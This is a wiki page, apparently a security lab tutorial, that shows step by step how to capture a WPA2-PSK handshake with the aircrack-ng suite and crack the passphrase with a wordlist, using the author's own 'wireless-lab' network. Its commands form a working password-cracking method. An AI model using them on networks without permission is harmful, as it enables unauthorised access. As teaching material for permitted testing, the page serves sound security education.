Skip to content
Christopher Hopkins edited this page Dec 6, 2017 · 14 revisions

Disclaimer

I am not a lawyer. I am definitely not your lawyer.

Only apply the techniques described below to networks you own or have explicit (written) permission to perform WiFi security assessment techniques upon.

It is your responsibility to familiarize yourself with applicable laws before performing any/all of the techniques below. I am not responsible for your actions.

Explanation

WPA2 PSK is probably the most commonly deployed protocols used to secure wireless networks. It was designed and intended for use in homes and small offices. PSK stands for Pre-Shared Key. The pre-shared key is a shared secret that everyone who connects to the network must use. The pre-shared key is usually between 8 and 63 characters in length.

WPA2 PSK is vulnerable to password cracking attacks if default or weak passwords/pass phrases are used. The techniques described below are an example of exploiting this common weakness.

Prerequisites

We will be using the following tools during the course of this exercise:

  • iwconfig (Used to inspect the available wireless network interfaces)
  • iwlist (Used to obtain a list the available wireless networks [and their associated details] in your area)
  • aircrack-ng (Used to capture and crack the pre-shared key)

I recommend using Kali Linux because all of these tools are pre-installed.

In order to capture (and crack) the pre-shared key you will need a wireless adapter that can be placed in 'monitor' mode. Most wireless adapters operate in 'managed' mode, this means that it acts as a client that connects to an access point (which operates in 'master' mode). 'Monitor' mode enables a wireless adapter to capture packets without first associating with a network. Not all drivers for wireless adapters support placing them into 'monitor' mode. Chances are that it is unlikely that your preinstalled WiFi adapter cannot be easily placed into 'monitor' mode. Look here to find wireless adapters whose drivers support 'monitor' mode.

Demonstration

Note: You must run the following commands with root privileges.

Identify your wireless adapter

# iwconfig

This should generate output similar to the following:

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm 
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

lo        no wireless extensions.

'wlan0' is probably your primary wireless adapter. If you have attached an external wireless adapter (for example one known to be capable of being placed into 'monitor' mode), then you may want to use wlan1 for this exercise.

Scan for available wireless networks

Run the following command:

# iwlist <wireless adapter> scanning

This should generate output similar to the following:

wlan0     Scan completed :
          Cell 05 - Address: F4:63:49:27:E8:B5
              Channel:1
              Frequency:2.412 GHz (Channel 1)
              Quality=70/70  Signal level=-27 dBm  
              Encryption key:on
              ESSID:"wireless-lab"
              Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                  9 Mb/s; 12 Mb/s; 18 Mb/s
              Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
              Mode:Master
              Extra:tsf=00000009ccd85bbc
              Extra: Last beacon: 32ms ago
              IE: Unknown: 0012537072696E7457694669612D323745384234
              IE: Unknown: 010882848B960C121824
              IE: Unknown: 030101
              IE: Unknown: 2A0100
              IE: Unknown: 32043048606C
              IE: Unknown: 2D1A2C101EFF00000000000000000000000000000000000000000000
              IE: Unknown: 3D1601000000000000000000000000000000000000000000
              IE: IEEE 802.11i/WPA2 Version 1
                  Group Cipher : TKIP
                  Pairwise Ciphers (2) : TKIP CCMP
                  Authentication Suites (1) : PSK
              IE: Unknown: DD180050F2020101000003A4000027A4000042435E0062322F00
              IE: Unknown: DD1E00904C332C101EFF00000000000000000000000000000000000000000000
              IE: Unknown: DD1A00904C3401000000000000000000000000000000000000000000
              IE: Unknown: DD0600E04C020160

In order to target a wireless network, you should note the the Address, ESSID, and channel associated with that network.

Set the wireless interface in 'monitor' mode

Run the following command:

# airmon-ng start <wireless adapter>

This should generate output similar to the following:

PHY	        Interface	Driver		Chipset

phy1	wlan0		rt2800usb	Ralink Technology, Corp. RT5370

	(mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
	(mac80211 station mode vif disabled for [phy1]wlan0)

Hopefully, this will place the specified wireless adapter into 'monitor' mode. You can check your adapters again using 'iwconfig', you should see that your specified wireless adapter now has a 'mon' appended to it.

Capture traffic

With your wireless adapter now in 'monitor' mode, run the following command:

# airodump-ng <wireless adapter in monitor mode> --bssid <target network address> --channel <target network channel> --write <output file name> 

You want to wait until airodump-ng has captured a four-way handshake (which occurs when a client device connects to an access point). It should look similar to the following:

sample output

Once airodump-ng has captured a four-way handshake, then you can press 'Cntrl-C' to terminate the capture.

Crack the PSK

Now we will use aircrack-ng to crack the pre-shared key. In order to do this we need a list of common passwords. I recommend using the '/usr/share/wordlist/rockyou.txt.gz' wordlist. If you use this wordlist, then copy and decompress it wit the following commands:

# cp /usr/share/wordlist/rockyou.txt.gz .
# gzip -d rockyou.txt.gz

Then run aircrack-ng to crack the pre-shared key with the following command:

# aircrack-ng <capture output file> -w rockyou.txt (or another wordlist)

This should generate output similar to the following:

sample output

The line with 'KEY FOUND!' shows the pre-shared key.

Practical Exercise

Nothing teaches like doing it yourself. Please use the steps/techniques above to crack my wireless lab. I grant you permission to utilize the techniques above on my wireless lab access point.

The network name is: wireless-lab

Conclusion

Happy Hacking!

Clone this wiki locally